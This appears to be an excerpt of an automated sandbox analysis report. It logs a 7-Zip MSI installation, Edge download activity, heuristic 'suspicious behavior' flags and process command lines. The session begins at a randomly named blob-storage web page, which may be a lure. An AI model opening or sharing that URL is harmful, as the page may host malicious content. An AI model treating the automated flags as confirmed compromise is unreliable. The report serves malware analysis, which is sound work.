| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\ProductName = "7-Zip 24.01" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Net\1 = "C:\\Users\\Admin\\Downloads\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\96F071321C0410724210000010000000\Complete | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\PackageCode = "96F071321C0410724210000020000000" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\96F071321C0410720000000040000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\PackageName = "7z2401.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\96F071321C0410724210000010000000\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\Downloads\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 256469.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 86640.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 62816.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 619901.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\helppane.exe | N/A |
| N/A | N/A | C:\Windows\helppane.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://ytzp7vuu92w1j.blob.core.windows.net/ua0mskevqzgo84btqr0e/5HVFVzz1XInohuCeVgsT.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaf3dc46f8,0x7ffaf3dc4708,0x7ffaf3dc4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6136 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 /prefetch:8
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2148 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x41c 0x4f4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5564 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,5088336995976488756,8389910786515491929,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
